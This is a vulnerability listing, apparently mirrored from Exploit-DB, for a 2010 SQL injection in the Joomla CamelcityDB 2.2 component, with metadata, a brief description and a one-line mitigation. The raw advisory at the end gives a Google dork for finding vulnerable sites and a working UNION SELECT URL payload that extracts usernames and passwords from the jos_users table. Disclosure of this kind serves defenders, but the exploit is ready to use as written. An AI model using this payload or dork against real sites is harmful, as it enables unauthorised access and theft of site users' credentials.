Joomla Component (com_camelcitydb2) SQL Injection Vulnerability

vendor:

CamelcityDB 2.2

by:

Amine_92

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: CamelcityDB 2.2

Affected Version From: All versions

Affected Version To: All versions

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: All

2010

Joomla Component (com_camelcitydb2) SQL Injection Vulnerability

A SQL injection vulnerability exists in Joomla CamelcityDB 2.2, which allows an attacker to execute arbitrary SQL commands via the 'id' parameter in a 'index.php?option=com_camelcitydb2&view=all&Itemid=15' request. An attacker can exploit this vulnerability to gain access to sensitive information from the database, such as usernames and passwords.

Mitigation:

Ensure that user-supplied input is properly sanitized and validated before being used in SQL queries.

Source

Exploit-DB raw data:

==============================================================
Joomla Component (com_camelcitydb2) SQL Injection Vulnerability
==============================================================
 
###########################
Title : Joomla Component (com_camelcitydb2) SQL Injection Vulnerability
Script : Joomla CamelcityDB 2.2
Date : 02/08/2010
Author : Amine_92
Tested : All version
Home : http://vbhacker.net
Dork : inurl:"option=com_camelcitydb2"
contact : amine92_16@hotmail.fr
###########################  
          
[ Vulnerable File ]
      
[path]/index.php?option=com_camelcitydb2&view=all&Itemid=15
 
[SQL]:
 
/index.php?option=com_camelcitydb2&id=-3+union+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11+from+jos_users--
 
##############################################################  
Thank's to : All Hacker Mu$lim & Poeple of Gaza